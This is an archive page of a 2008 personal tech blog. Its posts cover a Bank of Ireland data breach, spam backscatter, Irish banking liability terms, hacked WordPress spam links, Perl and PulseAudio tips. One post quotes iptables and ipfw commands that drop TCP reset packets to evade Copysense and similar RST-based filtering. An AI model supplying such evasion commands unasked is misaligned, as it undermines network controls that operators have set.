Last week, the bank said that medical records, bank account details, names, addresses and dates of birth of 10,000 customers were on the laptops. […]

Bank of Ireland said an assessment had concluded that the risk of fraud arising from the thefts was ‘very low’, as the data on the laptops did not include bank account passwords, PINs or copies of signatures.

So a fraudster would have medical records, bank account details, names, addresses and dates of birth of 10,000 customers, but the risk of fraud is ‘very low’? Incredible.

Update: make that 30,000 customers.

Update 2: 31,500 customers, and a sample letter.

Merry Spamiversary

Published April 27, 2008

Peter G. Neumann at the RISKS Forum notes that Last Friday was the anniversary of the sending of the first e-mail spam:

[Thanks to Mike Hogsett for noting this event, and Brad Templeton for recording it.]

What is allegedly the very first spam message was sent roughly 30 years over the ARPANET.

In seeing this, Mike was amused because he works with some of the people it was addressed to, of whom a few are still at SRI: NEUMANN@SRI-KA, GARVEY@SRI-KL, MABREY@SRI-KL, WALDINGER@SRI-KL and some of whom are retired: ENGELBART@SRI-KL, NIELSON@SRI-KL, GOLDBERG@SRI-KL (I am always amused when some of these old ARPANET addresses show up in today’s incarnations of spam.)

Also somewhat before Mike’s time, Geoff Goodfellow, Eric Kunzelman, Dan Lynch, and many others at SRI were instrumental in the evolution of the ARPANET.

Also included in the enormous enumerated TO: list (historically interesting in itself by not having been suppressed!) are Bill English (who was the catalyst for much of Doug Engelbart’s innovations being transitioned from SRI to PARC), Dave Farber, Irv Jacobs, Bob Metcalfe, Jon Postel (who by then had moved from SRI to ISI), three Sutherlands, and Lauren Weinstein, to name just a few.

Happy Birthday, Spam! Sorry I cannot wish you many happy returns.

What’s on this site, April 2008 edition

Published April 25, 2008

It’s been a while since I’ve listed the various sub-sites of taint.org in one post. I’ve just updated the taint.org wiki’s index page to include them, so might as well list them here, too:

my blog – you’re reading it ;)
IrishPulse – a site to aggregate the live updates of scores of Irish Twitter and Jaiku users.
Irish Blogs Top 100 By Technorati Rank – a ‘Top 100’ list of Irish weblogs, based on Technorati’s readership-estimation data.
Nearly-Live Planetary Desktop Backgrounds – desktop-sized high-quality PNG images of near-real-time cloud and satellite data, to create a nifty, nearly-live world map.
the C=64-izer – turn an image into something like what it’d look like on a Commodore 64.
Spicylinks – an automated link-blog summarizer similar to HotLinks, but open source.
the wiki.
Planet Antispam – syndicating a collection of anti-spam blogs.

Enjoy!

Bank of Ireland’s 10,000-customer security breach

Published April 22, 2008

Bank of Ireland, one of Ireland’s biggest high-street banks, was the subject of a breach notification yesterday — 4 laptops, containing unencrypted “sensitive personal information” about up to 10,000 customers, were stolen between June and October 2007. It seems the Irish Data Protection Commissioner was not informed until last Friday. The Financial Regulator is also looking into the incidents.

According to the Independent, the laptops ‘were being used by staff working for Bank of Ireland’s life assurance division. They contained the information about medical history, life assurance details, bank account details, names and addresses.’

This breach has raised quite a few issues.

First off, I was watching Questions and Answers last night, and was shocked by the naivete of the assembled panel. One panelist, for example, reckoned that common criminals wouldn’t understand the value of this data — so it was probably nothing to worry about!

There was absolutely no concept of how widespread identity theft has become — using stolen identity information to apply for credit cards is part of Petty Theft 101 these days, since filling out forms is a lot easier than breaking and entering, obviously. There was also no appreciation of how little protection Irish consumers have in this regard with current Irish banking T&Cs.

According to previous research, about 2% of accounts compromised in data breaches become victim to identity theft.

Some comments from the bank from those articles:

‘The data was not encrypted, although it is understood there was software security installed on the stolen computers.’

Doubtless, “software security” refers to some kind of useless Maginot Line boondoggle like Norton Internet Security. This would have absolutely no useful effect in this case. The only useful way to protect customer data on a stolen laptop is to use encrypted storage.

‘In the interim the bank has monitored all of these customer accounts and can confirm that there has been no evidence of fraudulent or suspicious activity.’

This is a fallacy. This data provides plenty of information regarding the customer’s identity — information which is useful to receive loans and credit fraudulently, elsewhere. Monitoring the bank’s accounts is of no help in that case. On top of that, identity information like your date of birth, mother’s maiden name, health status, and so on doesn’t expire — that info will still be useful for identity theft, 10 years from now, or as a stepping-stone to further fraud.

As John O’Shea noted on Twitter earlier, there was nothing on their website about it this morning; there is now, however — a broken link on the front page. oops!

Figuring out the puzzle and fixing the URL’s errors gets you to this page, which notes:

The laptops contained information relating to some customers who either obtained a quote or took out a Life Assurance policy with Bank of Ireland Life from the following branches:

Drogheda

Dunleer

Bagnelstown

Court Place Carlow

Stephens Green

Tallaght

Montrose

Anybody who is not a customer of these branches is not affected by this incident.

As far as I can make out, the bank didn’t issue this breach notification. It appears from the coverage that this information was first announced by Data Protection Commissioner Billy Hawkes to RTE yesterday, leaving the bank apparently scrambling to catch up:

“The thefts of the laptops were only brought to the attention of the appropriate authorities in the bank in the past number of weeks,” Bank of Ireland said in a statement that offered no other explanation for the long delay.

It would have been so much better if BoI had been proactive with breach notification — examples from overseas have illustrated its value. As Adam Shostack has noted repeatedly over the past few years: the rules have changed.

As for repercussions for BoI, it’ll be interesting to see if anything happens. For “live” customer data on up to 10,000 customers to be stored, in unencrypted form, on a laptop is terrible security practice — but as far as I know, there are no laws or regulations requiring anything better in Ireland, unfortunately. :( However:

Consideration will be given as to what further action will be sought from Bank of Ireland to ensure that the obligations contained in the Data Protection Acts in this area are met.

On a broader level, this issue serves to highlight once again the absolute necessity for all organisations in the public and private sector to take their data protection responsibilities seriously. In particular, all organisations should be assessing immediately the necessity for storing personal data on laptops. If a need is found, appropriate security measures such as encryption should be put in place immediately.

Go Billy! ;)

The best thing to come out of Caerphilly

Published April 21, 2008

Caerphilly is a small commuter town in South Wales, notable mainly for Caerphilly cheese and a castle.

Well, you can add one more thing to that list; its inhabitants also provided some key data in a major health study, from which emerged one great finding — it turns out that if you’re male, sex twice a week reduces the risk of death from heart disease by about half:

Men who said they had sex twice a week had a risk of dying half that of the less passionate participants who said they had sex once a month, Dr. Davey-Smith’s team said.

No other risk factor showed a statistically significant link to the frequency of orgasm.

The authors said that they had tried to adjust the study’s design to account for a factor that might explain the findings — that healthier, fitter men with more healthy life styles engaged in more sex. Even so, they could not explain the differences in risk. Hormonal effects on the body resulting from frequent sex could be among other possible explanations for the findings, Dr. Davey-Smith said.

Here’s the science bit, via the BMJ — a paper entitled ‘Sex and death: are they related? Findings from the Caerphilly cohort study’:

Result: Mortality risk was 50% lower in the group with high orgasmic frequency than in the group with low orgasmic frequency, with evidence of a dose-response relation across the groups. Age adjusted odds ratio for all cause mortality was 2.0 for the group with low frequency of orgasm (95% confidence interval 1.1 to 3.5, test for trend P=0.02). With adjustment for risk factors this became 1.9 (1.0 to 3.4, test for trend P=0.04). Death from coronary heart disease and from other causes showed similar associations with frequency of orgasm, although the gradient was most marked for deaths from coronary heart disease. Analysed in terms of actual frequency of orgasm, the odds ratio for total mortality associated with an increase in 100 orgasms per year was 0.64 (0.44 to 0.95).

Conclusion: Sexual activity seems to have a protective effect on men’s health.

The perfect excuse ;) Thanks, Caerphilly!

My commute vs Jaffa Cakes

Published April 18, 2008

Last weekend, I picked up a super-cheap cycling computer in Aldi for 20 Euros. I cycle to work, and I thought it’d be fun to get some geeky number-crunching in on my daily commute.

Here are the figures for my trip into work:

Ride time: 12:16
Trip distance: 2.4 miles
Avg speed: 12.7 MPH
Max speed: 22.4 MPH
Total KCal work performed: 136
Max pulse rate: 146

Given that there are 46 kilocalories in a Jaffa Cake, 136 KCal means that every day, I can eat 3 Jaffa Cakes with impunity. Result! ;)

Also: some relevant commentary from Penny Arcade.

Google Calendar ‘Quick Add’ smart keyword bookmark

Published April 17, 2008

Google Calendar has a nifty feature, “Quick Add”, where you can enter a natural-language string like “lunch with Justin, 1pm 20/4/08”, it parses it, and adds an appointment to your calendar. However, the link in the Calendar UI can’t be bookmarked; you have to go to the Calendar page, wait for it to sloooowly load all its AJAX bits, hit the link, and only then type the appointment details, by which time I’ve forgotten it anyway ADD-style. ;)

Elias Torrez came up with a Firefox extension to use the Quick Add feature in one keypress, but in my opinion that’s overkill — I don’t want the overhead of another extension, the upgrade worries, and I don’t want it using up a keyboard shortcut either. I’d prefer to just have this as a Firefox Smart Keyword — and thankfully the trick is in the comments for his blog post, from someone called Bjorn. So here’s the deal:

Name: Google Calendar Quick Add

Location: http://www.google.com/calendar/event?ctext=+%s+&action=TEMPLATE&pprop=HowCreated%3AQUICKADD
Keyword: newcal Description: add a new event in Google Calendar



enjoy!


		
				
			
								
					Downloadable movies and the DVP5960
				
				
    
		Published April 14, 2008	
	
			
			
				So Mulley mentions
that Moviestar.ie are planning to offer downloadable
movies.
Great concept, but I can guarantee the execution will be crap on a stick. :(

First off, the content available:


  ‘When the service goes live on 1 May, customers will be able to avail of
  content from several Irish producers including Network Ireland Television, as
  well as Video International’s film library which includes films like The Little
  Shop of Horrors.  The company is also seeking content from both the History and
  Biography Channels, which would mean a substantial back catalogue of
  documentary shows.’


Sorry, but: snore.

Secondly, the technology used:


  ‘Moviestar.ie content must be downloaded onto a PC or laptop but can then be
  transferred over to digital media players like the iPod Touch for viewing on
  the go. This service will be compatible with Apple Macs but only if the user
  downloads Windows Media Player.’


So in other words, it’s Windows Media.  That means it won’t play on my TV
through my MythTV box, on a USB stick
plugged into a Philips DVD player, on my Linux laptop, or even on a normal DVD player using a burned DVD.

Too little, too late.  Plenty of Irish consumers are already consuming
downloaded video — as the popularity of the Philips DVP5960 demonstrates.   For legal video downloads to
work, they need to be somewhere remotely near as convenient and usable
as BitTorrent.

Using DRM is just falling down the same rabbit hole that swallowed up downloadable music for 5 years.  Nobody used that either, until gradually the companies involved realised that opening up was the only way to get customers, bringing us to where we are today — legal downloads using the MP3 format.

BTW, I know that’s the same DRM technology used by Channel 4’s “4oD” download service.  Big deal — I don’t bother trying to watch that stuff either, for the same reasons.  If Channel 4 jumped off a cliff, would Moviestar.ie jump after them?



(By the way, that Philips DVD player
is a total success story.  That’s a name-brand
hardware manufacturer, making a low-end,
$60
DVD player, with support for viewing downloaded XviD AVI movies on a USB stick.
Apparently it’ll also play off USB hard disks, too.  It’s immensely popular;
for example, here’s a customer review of 10/10: “Best thing ever”.  Several of my friends have them, and
praise them highly.  I’m coming up to DVD player replacement time, and I’m
planning to get one too.)


		
				
			
								
					Backscatter rising
				
				
    
		Published April 12, 2008	
	
			
			
				Recently, more and more people have been complaining about backscatter; its
levels seem to have increased over the past
few weeks.

If you’re unfamiliar with the terminology — backscatter is mail you didn’t ask to receive, generated by legitimate, non-spam-sending systems in response to spam.  Here are some examples, courtesy of Al Iverson:


Misdirected bounces from spam runs, from mail servers who “accept then bounce” instead of rejecting mail during the SMTP transaction.
Misdirected virus/worm “OMG your mail was infected!” email notifications from virus scanners.
Misdirected “please confirm your subscription” requests from mailing lists that allow email-based signup requests.
Out of office or vacation autoreplies and autoresponders.
Challenge requests from “Challenge/Response” anti-spam software. Maybe C/R software works great for you, but it generates significant backscatter to people you don’t know.


It used to be OK to send some of these types of mail — but no longer.
Nowadays, due to the rise in backscatter caused by spammer/malware abuse, it is
no longer considered good practice to “accept then bounce” mail from an SMTP
session, or in any other way respond by mail to an unauthorized address of the
mail’s senders.

Backscatter as spam delivery mechanism

I would hazard a guess that this rise is due to one of the major spam-sending botnets adopting the use of “real” sender addresses rather than randomly-generated fake ones, probably in order to evade broken-by-design Sender-Address
Verification filters.

There’s an alternate theory that spammers use backscatter as a means of spam
delivery — intending for the mails to bounce, in effect using the bounce
as the spam delivery mechanism.  Symantec’s most recent “State of Spam” report in particular highlights this.

I don’t buy it, however.  Compare their own example message — here’s what
the mail originally sent by the spammer to the bouncer, rendered:



And here’s what it looks like once it passes through the bouncer’s
mail system:



That’s simply unreadable.  There’s absolutely no way for a targeted
end user to read the “payload” there…

Getting rid of it

I haven’t run into this recent spike in backscatter at all, myself, since I have a working setup that deals
with it.  This blog post
describes it.  If you’re using Postfix and SpamAssassin, it would be well worth taking a look; if you’re just using SpamAssassin and not Postfix, you should still try using the Virus Bounce Ruleset to rid yourself of various forms of unwanted bounce message.

Note that you need to set the ‘whitelist_bounce_relays’ setting to use
the ruleset, otherwise its rules will not fire.

SPF

There’s a theory that setting SPF records (or other sender-auth mechanisms like DomainKeys or DKIM) on your domains, will reduce
the amount of backscatter sent to your domains.  Again, I doubt it.

Backscatter is being sent by old, legacy mail systems.  These systems
aren’t configured to take SPF into account either.  When they’re eventually
updated, it’s likely they’ll be fixed to simply not send “accept then
bounce” responses after the SMTP transaction has completed.  It’s
unlikely that a system will be fixed to take SPF into account, but
not fixed to stop sending backscatter noise.

It’s good advice to use these records anyway, but don’t do it because you want to stop backscatter.

What about my own bounces?

You might be worried that the SpamAssassin VBounce ruleset will block bounces
sent in response to your own mail.  As long as the error conditions are flagged
during the SMTP transaction (as they should be nowadays), and you’ve specified
your own mailserver(s) in ‘whitelist_bounce_relays’, you’re fine.


		
				
			
								
					Liability for internet banking fraud in Ireland
				
				
    
		Published April 11, 2008	
	
			
			
				Steven Murdoch at Light Blue Touchpaper notes that the UK banking code now includes wording to make the customer liable for losses attributable to them “acting without reasonable care”, where “reasonable care” bizarrely includes installing anti-virus software on their PCs.

The Register also picked up on this, as did Brian Krebs in the Washington Post, comparing it with the vastly superior customer
protection offered by the US banks.

I was curious, so I went looking at the Irish situation.  Needless to say, it’s not pretty.

I couldn’t find anything in the Irish Banking Federation’s Code Of Practice for Personal Customers, unfortunately.
However, AIB’s terms and conditions for use of their Internet Banking product contain this:


  5 Transactions on the Account:
  
  5.1 The User authorises AIB to act upon any instruction to debit an Account received through AIB Phone & Internet Banking which has been transmitted using all or part of the Registration Number, PAC and/or any other authentication process which AIB may require to be used in connection with AIB Phone & Internet Banking (including but not limited to a Code Card) without requiring AIB to make any further authentication or enquiry, and all such debits shall constitute a liability of the User. Where the User’s Account is maintained in joint names the liability of the Account Holders shall be joint and several.
  
  5.6 Entries in an Account in respect of Bill Payments, Fund Transfers and Top-Ups shall be prima facie evidence that the transfer or debit represented thereby has been duly authorised and shall be binding on AIB and the User unless and until proved to the contrary.
  
  6 International Payments:
  
  6.9 To the extent permitted by law, and notwithstanding anything to the contrary herein, AIB shall not be liable for, and shall be indemnified in full by the User against, any loss, damage or other liability that the User or AIB may suffer arising out of or in connection with the User’s use of the International Payment services (whether as the sender or receiver of an International Payment) unless such loss, damage or liability is caused by AIB’s fraud, wilful default or negligence.  In no circumstances will AIB be liable for any increased costs or expenses, or for any loss of profit, business, contracts, revenues or anticipated savings or for any special, indirect or consequential damage of any nature whatever.


As far as I can tell, basically the AIB have no liability here at all — if a bad
guy gets hold of your PIN code and account number, and empties your account, tough
luck.

What about Bank of Ireland? It seems they agreed to refund phishing losses in an incident back in 2006.  But their
365online Terms and Conditions now say this:


  13  Indemnity
  
  13.2   Without prejudice to the generality of Clause 13.1 above, the Bank shall have no liability            whatsoever in respect of any loss suffered by the Customer as a result of their breach of            Clause 4 [jm: Security/Authentication] by way of knowingly, negligently or recklessly disclosing the Security Devices or            any of them.


So it’s all pretty bad news for Irish banking customers.  This is pretty bad
news — it’s only a matter of time before Irish banks are targeted by a new
Banking Trojan, and
given that antivirus software has an 80% miss rate these
days, even having an up-to-date AV scanner isn’t going to be much help.

My answer?  Don’t do internet banking on Windows machines.
Simple as that.


		
				
			
								
					IIA’s nasty infection
				
				
    
		Published April 9, 2008	
	
			
			
				The Irish Internet Association have a weblog at blog.iia.ie. Back on January 30, this had a Technorati rank of 587893, with 21 inbound links from 14 blogs.  That’s about what you’d expect — comparable with Chris Horn’s blog, for instance.

However, fast forward to today, and in the intervening 3 months, it seems to have suddenly shot up to 23,322 inbound links from 550 blogs, giving it a Technorati rank of 6,870.

To put that in perspective, that puts it comfortably in the top 3 in the Irish Blogs
Technorati Top 100 — beating Damien Mulley‘s 7,859,
but just short of Donncha O’Caoimh‘s stellar 3,434 — and
ahead of these other gods of the Irish blogosphere:


Tom Raftery (14,800, 9,224 links)
THE Graham Linehan (13,165)
Slugger O’Toole (17,279, 2,941 links)
Twenty Major (18,001)
Nialler9 (24,286)


Pretty impressive ;)

I was curious, so I went investigating.  Of those thousands of inbound links,
here’s some samples of the most recent, pasted from the Technorati inbound
links page:


  barkingmoose
  
  Atacand Free instant online credit report Application credit card Cheap Paxil Does your credit score Household bank credit card application Apr for credit cards Buy Cephalexin? Aciphex Cheap Feldene Zovirax Risperdal Buy Naprosyn, Propecia Credit score codes Poor credit score, Propecia Uk Canada credit card online application Motrin Business credit score Cheap Cialis Jelly 50 Cent Free Ringtones Celexa How to improve my credit score Buy Inderal
  
  4 days ago in barkingmoose by barkingmoose · Authority: 3
  
  The Peninsula’s Edge
  
  Jc penny credit card application Credit cards 1.99 apr ny Affect credit score For credit score American express credit card application Freee credit report Instant fleet 0 apr credit card application? Hydrocodone For low credit scores, No credit instant approval credit cards Annual creditreport.com, Tramadol Credit reporting service Configuration VPN Cheap credit reports. Buy Premarin Carisoprodol Soma Propecia Generic
  
  6 days ago in The Peninsula’s Edge by ricsmith510 · Authority: 9
  
  The Incredible Blog
  
  Prepaid credit card uk Phentrimine Cheap Zovirax: Calan Highest credit score Ambien Valtrex: Ultram 3 credit reporting agencies Credit cards online application Instant approval student credit cards, Apr balance transfer credit cards Free government credit report Transunion free credit report Credit card debt bankruptcy? Propecia Propecia Uk! Correcting credit reports Cialis Uk Credit rating report Buy Synthroid Instant capital one 0 interest credit card application
  
  7 days ago in The Incredible Blog · Authority: 1
  
  Quilters’ Blogs
  
  Annualcreditreport Instantly instant free online credit report Credit cards instant approval Guaranteed instant approval credit cards Lexapro Get my credit score, Card consolidation credit debt financial internet Chevron credit card services. Risperdal Lower credit card debt VPN connection One credit card application Xanax Viagra! Vasotec Diazepam Fix my credit report Credit report bureau. Cialis Soft Tabs! Ativan? Secured loans to increase credit score Cheap Amaryl Cheap Prednisone Alprazolam! Cheap
  7 days ago in Quilters’ Blogs · Authority: 5
  
  TPN :: Martial Arts Explorer
  
  Luvox Credit score of Plavix 50 Cent Free Ringtones, Cheap Elavil? Free consumer credit report: Famvir Improve credit score fast Phentermine Online Zovirax Cialis Soft Tabs Apr for credit cards! Ultram Zoloft Credit card deal 0 Deltasone! VPN: Cheap Cardura Credit score rankings! Annual credit report .com Interest rate credit score: Carisoprodol Flagyl ER Online Cialis Soft Tabs Enable VPN 0 apr credit card application Free business credit report Ambien Low
  7 days ago in TPN :: Martial Arts Explorer · Authority: 56


Take a look at the ‘inbound links’ list — thousands more just like that.

All of the affected blogs have been hacked to deliver these spam links.  They run unpatched versions of WordPress vulnerable to a major security hole.  On a casual visit, their
pages seem fine — but “View Source”, scroll to the bottom, and there are thousands of
spam links for drugs, ringtones, cheap credit, etc. on each one, exactly as
above, and as described by Kevin Burton in his description of the current epidemic of blog spam.

How did links to the IIA’s blog wind up in this collection?

It’s worth noting that the IIA’s blog does not display the same symptoms — the
links aren’t present on their pages.

However, this post provided a good tip as to what
has happened.  Those infected blog pages point, in turn, to other infected blogs.  Somewhere within the IIA’s blog setup, there’s a page inserted
by a bad guy, collecting thousands of illicit links from thousands of other infected sites — and sure enough, Irish Web Watcher found it on the IIA’s site — here it is.

Looks like the IIA have a pretty major disinfection job on their hands, and
urgently — there’s already a lot of spammy results appearing in the Google
index
from that site, and the next step after that is usually removal from the
index
once Google notice it.


		
				
			
								
					Google now include Code Search in normal results
				
				
    
		Published April 7, 2008	
	
			
			
				Latest Google curiosity… I hadn’t spotted this before: it appears Google is
now including ‘Code Snippet’ results in the results for its normal search.  For
example, a search for XSLoader gives
this result:



The results highlighted on the page are for a local variable in
a Java module, rather than the much more common XSLoader perl module.  I guess ‘Code Snippet’ search is case-sensitive.


		
				
			
								
					RAII in perl
				
				
    
		Published April 2, 2008	
	
			
			
				Suppose you have matching start() and end() functions.  You want to ensure
that each start() is always matched with its corresponding end(), without
having to explicitly pepper your code with calls to that function.  Here’s a
good way to do it in perl — create a guard object:

package Scoper;
sub new {
  my $class = shift; bless({ func => shift },$class);
}
sub DESTROY {
  my $self = shift; $self->{func}->();
}


Here’s an example of its use:

{
  start();
  my $s = Scoper->new(sub { end(); });
  [... do something...]
}
[at this point, end() has been called, even if a die() occurred]


The idea is simply to use DESTROY to perform whatever the cleanup operation is.
Once the $s object goes out of scope, it’ll be deleted by perl’s GC, in the process of which, calling $s->DESTROY().  In other words, it’s using the GC for its own ends.

Unlike an eval { } block to catch die()s, this will even be called if exit() or POSIX::exit() is called.  (POSIX::_exit(), however, skips DESTROY.)

This is a pretty old C++ pattern — Resource Acquisition Is
Initialization.
C++’s auto_ptr template class is the
best-known example in that language.   Here’s a perl.com article on its use in
perl,
from last year, mostly regarding the CPAN module
Object::Destroyer.
To be honest, though, it’s 6 lines of code — not sure if that warrants
a CPAN module! ;)

RAII is used in SpamAssassin, in the Mail::SpamAssassin::Util::ScopedTimer class.


		
				
			
								
					“What’s New” archaeology
				
				
    
		Published March 31, 2008	
	
			
			
				jwz has, incredibly, resurrected
home.mcom.com, the WWW site of the Mosaic
Communications Corporation, as it was circa Oct 1994.

Edmund Roche-Kelly was kind enough to get in touch and note this link —
http://home.mcom.com/home/whatsnew/whats_new_0993.html:


  September 3, 1993
  
  IONA Technologies (whose product, Orbix, is the first full and complete implementation of the Object Management Group’s Common Object Request Broker Architecture, or CORBA) is now running a Web server.
  
  An online pamphlet on the Church of the SubGenius is now available.


Guess who was responsible for those two ;)

I was, indeed, running the IONA web server — it was set up in June
1993, and ran Plexus, a HTTP server written in Perl.  IONA’s server
was somewhere around public web server number 70, world-wide.

The SubGenius pamphlet is still intact, btw, although at a more modern,
“hyplan”-less URL these days.  It’ll be 15
years old in 6 months… how time flies!


		
				
			
								
					Sharing, not consuming, news
				
				
    
		Published March 28, 2008	
	
			
			
				The New York Times yesterday had a great article about modern news consumption:


  According to interviews and recent surveys, younger voters tend to be not just consumers of news and current events but conduits as well — sending out e-mailed links and videos to friends and their social networks. And in turn, they rely on friends and online connections for news to come to them. In essence, they are replacing the professional filter — reading The Washington Post, clicking on CNN.com — with a social one.
  
  “There are lots of times where I’ll read an interesting story online and send the URL to 10 friends,” said Lauren Wolfe, 25, the president of College Democrats of America. “I’d rather read an e-mail from a friend with an attached story than search through a newspaper to find the story.”
  
  [Jane Buckingham, the founder of the Intelligence Group, a market research company] recalled conducting a focus group where one of her subjects, a college student, said, “If the news is that important, it will find me.”


In other words, as Techdirt put it, this generation of news readers now focuses on sharing the news, rather than just consuming it — and if you want to share a news story, there’s no point passing on a subscription-only URL that your friends and contacts cannot read.

What newspapers need to do to remain relevant for this generation of news consumers is not to hide their content behind paywalls and registration-required screens.  The Guardian got their heads around this a few years back, and have come along in leaps and bounds since then.  I wonder if the Irish Times is listening?


		
				
			
								
					converting TAP output to JUnit-style XML
				
				
    
		Published March 26, 2008	
	
			
			
				Here’s a perl script that may prove useful:
tap-to-junit-xml…

NAME

tap-to-junit-xml – convert perl-style TAP test output to JUnit-style XML

SYNOPSIS

tap-to-junit-xml "test suite name" [ outputprefix ] < tap_output.log


DESCRIPTION

Parse test suite output in TAP (Test Anything Protocol) format, and produce XML output in a similar format to that produced by the <junit> ant task.  This is useful for consumption by continuous-integration systems like Hudson.

Written in perl, requires TAP::Parser and XML::Generator.  It's based on junit_xml.pl by Matisse Enzer, although pretty much entirely rewritten.


		
				
			
								
					SpamAssassin thresholds again
				
				
    
		Published March 25, 2008	
	
			
			
				Following on from this post, I came
across a great graphing Flash applet from amCharts
which is ideal for putting a much improved UI on those SpamAssassin ‘required_score’ threshold line charts.

Here’s the result — nice, zoomable,
dynamic charts, displaying the effectiveness of various ‘required_score’
thresholds depending on whether Bayes and network rules are active in your
SpamAssassin configuration.  Very cool!


		
				
			
								
					Pulseaudio ate my wifi
				
				
    
		Published March 21, 2008	
	
			
			
				I’ve just spent a rather frustrating morning attempting to debug
major performance problems with my home wireless network; one of my
machines couldn’t associate with the AP at all anymore, and the
laptop (which was upstairs in the home office, for a change) was
getting horrific, sub-dialup speeds.

I did lots of moving of Linksys APs and tweaking of “txpower” settings,
without much in the way of results.  Cue tearing hair out etc.

Eventually, I logged into the OpenWRT AP over SSH, ran iftop to see what
clients were using the wifi, and saw that right at the top, chewing up all the
available bandwidth, was a multicast group called 224.0.0.56.  The culprit!
There was nothing wrong with the wifi setup after all — the problem was
massive bandwidth consumption, crowding out all other traffic.

You see, “pulseaudio”, the new Linux sound
server, has a very nifty feature — streaming of music to any number of
listeners, over RTP.
This is great.  What’s not so great is that this seems to have magically turned itself on, and was broadcasting UDP traffic over multicast on my wifi network, which didn’t have enough bandwidth to host it.

Here’s how to turn this off without killing “pulseaudio”.  Start “paman”, the PulseAudio Manager, and open the “Devices” tab:



(click on the image to view separately, if it’s partly obscured.)

Select the “RTP Monitor Stream” in the “Sources” list, and open “Properties”:



Hit the “Kill” button, and your network is back to normal.  Phew.

Another (quicker) way to do this, is using the command-line “pacmd” tool:

echo kill-source-output 0 | pacmd


It’s a mystery where this is coming from, btw.  Here’s what “paman” says it
came from:



But I don’t seem to have an active ‘module-rtp-send’ line in my configuration:

: jm 98...; grep module-rtp-send /etc/pulse/* /home/jm/.pulse*
/etc/pulse/default.pa:#load-module module-rtp-send source=rtp.monitor


Curious.  And irritating.

Update: it turns out there’s another source of configuration — GConf.  “paprefs” can be used to examine that, and that’s where the setting had been set, undoubtedly by me hacking about at some stage. :(


		
				
			
								
					more crap from St. Petersburg
				
				
    
		Published March 19, 2008	
	
			
			
				Noted with alarm in this comment regarding the horrific privacy-invading adware that is Phorm:


  Their programmers are mostly Saint Petersburg-based, home to the Russian Business Network.  Their servers are kept only in Saint Petersburg and China, so no ISP customer data is ever stored in the UK. Any personally identifying information they obtain about UK citizens can never be seen or purged using existing UK Data Protection Laws.


St. Petersburg is turning out to be quite a source of online nastiness — the new Boca Raton.


		
				
			
								
					Evading Audible Magic’s Copysense filtering
				
				
    
		Published March 12, 2008	
	
			
			
				As I noted on Monday, the
Irish branches of several major record companies have brought a case against
Eircom, demanding in part that the ISP install Audible Magic’s Copysense anti-filesharing appliances on their network infrastructure.

I thought I’d do a quick bit of research online into how they do their filtering.
Here’s what the EFF had to say:


  Audible Magic’s technology can easily be defeated by using one-time session
  key encryption (e.g., SSL) or by modifying the behavior of the network stack
  to ignore RST packets.


It’s interesting to see that they used RST packets — this is the same mechanism
used by the “Great Firewall of China” to censor the internet:


  the keyword detection is not actually being done in large routers on the
  borders of the Chinese networks, but in nearby subsidiary machines. When
  these machines detect the keyword, they do not actually prevent the packet
  containing the keyword from passing through the main router (this would be
  horribly complicated to achieve and still allow the router to run at the
  necessary speed). Instead, these subsiduary machines generate a series of TCP
  reset packets, which are sent to each end of the connection. When the resets
  arrive, the end-points assume they are genuine requests from the other end to
  close the connection — and obey. Hence the censorship occurs.


But there’s a very easy way to avoid this, according to that blog post:


  However, because the original packets are passed through the firewall
  unscathed, if both of the endpoints were to completely ignore the firewall’s
  reset packets, then the connection will proceed unhindered! We’ve done some
  real experiments on this — and it works just fine!! Think of it as the Harry
  Potter approach to the Great Firewall — just shut your eyes and walk onto
  Platform 9¾.


Clayton, Murdoch, and Watson’s paper on this technique provides the Linux and FreeBSD firewall commands they used to do this. Here’s Linux:

   iptables -A INPUT -p tcp --tcp-flags RST RST -j DROP


For FreeBSD, the command is:

   ipfw add 1000 drop tcp from any to me tcpflags rst in


So assuming Copysense haven’t changed their approach yet, it’s trivial to
block Copysense’s filtering, if both ends are running Linux or BSD.  I predict
if Copysense becomes widespread, someone will patch Windows TCP to do the same.

I love Audible Magic’s response:


  The current appliance happens to use the TCP Reset to accomplish this today.
  There are many other technical methods of blocking transfers. Again, we have
  strategies to deal with them should they ever prove necessary. This is why we
  recommend our customers purchase a software support agreement which provides
  for these enhancements that keep their purchase up-to-date and protect their
  investment.


in other words, “hey customers! if you don’t have a support contract, you’re
shit out of luck when the p2p guys get around our filters!”  Nice. ;)



	
		Posts navigation
		Previous
1
…
86
87
88
…
131
Next

Justin's Linklog Posts